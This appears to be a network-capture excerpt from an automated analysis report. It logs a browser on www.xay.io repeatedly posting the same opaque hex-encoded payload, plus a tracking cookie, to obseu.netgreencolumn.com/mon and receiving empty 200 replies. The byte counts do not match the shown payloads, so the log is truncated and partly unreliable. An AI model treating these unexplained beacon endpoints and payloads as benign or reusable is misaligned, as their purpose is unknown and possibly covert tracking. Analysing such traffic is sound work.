2025-01-12 00:33:27 UTC	1693	OUT	Data Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 38 63 31 33 31 65 38 34 37 38 61 39 63 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 36 38 61 36 66 32 36 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 64 64 37 38 62 64 63 30 66 37 64 33 61 31 63 66 61 37 39 32 32 35 31 64 35 33 32 64 66 36 35 39 36 30 30 33 35 30 63 32 31 39 33 30 31 30 32 30 39 33 32 35 35 35 61 63 33 65 64 33 66 31 65 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 62 32 35 66 34 35 34 37 31 61 64 30 66 32 65 36 34 31 30 64 32 35 61 66 65 35 61 65 63 64 32 39 34 38 61 37 66 65 30 37 Data Ascii: e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07
2025-01-12 00:33:27 UTC	276	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: http://www.xay.io Content-Length: 0 Content-Type: application/json Date: Sun, 12 Jan 2025 00:33:27 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:28 UTC	401	OUT	GET /mon HTTP/1.1 Host: obseu.netgreencolumn.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:28 UTC	268	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: undefined Content-Length: 0 Content-Type: application/json Date: Sun, 12 Jan 2025 00:33:28 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:32 UTC	665	OUT	POST /mon HTTP/1.1 Host: obseu.netgreencolumn.com Connection: keep-alive Content-Length: 1696 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: http://www.xay.io Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:32 UTC	1696	OUT	Data Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 38 63 31 33 31 65 38 34 37 38 61 39 63 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 36 38 61 36 66 32 36 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 64 64 37 38 62 64 63 30 66 37 64 33 61 31 63 66 61 37 39 32 32 35 31 64 35 33 32 64 66 36 35 39 36 30 30 33 35 30 63 32 31 39 33 30 31 30 32 30 39 33 32 35 35 35 61 63 33 65 64 33 66 31 65 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 62 32 35 66 34 35 34 37 31 61 64 30 66 32 65 36 34 31 30 64 32 35 61 66 65 35 61 65 63 64 32 39 34 38 61 37 66 65 30 37 Data Ascii: e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07
2025-01-12 00:33:32 UTC	276	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: http://www.xay.io Content-Length: 0 Content-Type: application/json Date: Sun, 12 Jan 2025 00:33:32 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:33 UTC	401	OUT	GET /mon HTTP/1.1 Host: obseu.netgreencolumn.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:33 UTC	268	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: undefined Content-Length: 0 Content-Type: application/json Date: Sun, 12 Jan 2025 00:33:33 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:38 UTC	665	OUT	POST /mon HTTP/1.1 Host: obseu.netgreencolumn.com Connection: keep-alive Content-Length: 2329 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: http://www.xay.io Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:38 UTC	2329	OUT	Data Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 38 63 31 33 31 65 38 34 37 38 61 39 63 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 36 38 61 36 66 32 36 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 64 64 37 38 62 64 63 30 66 37 64 33 61 31 63 66 61 37 39 32 32 35 31 64 35 33 32 64 66 36 35 39 36 30 30 33 35 30 63 32 31 39 33 30 31 30 32 30 39 33 32 35 35 35 61 63 33 65 64 33 66 31 65 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 62 32 35 66 34 35 34 37 31 61 64 30 66 32 65 36 34 31 30 64 32 35 61 66 65 35 61 65 63 64 32 39 34 38 61 37 66 65 30 37 Data Ascii: e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07
2025-01-12 00:33:38 UTC	276	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: http://www.xay.io Content-Length: 0 Content-Type: application/json Date: Sun, 12 Jan 2025 00:33:38 GMT Connection: close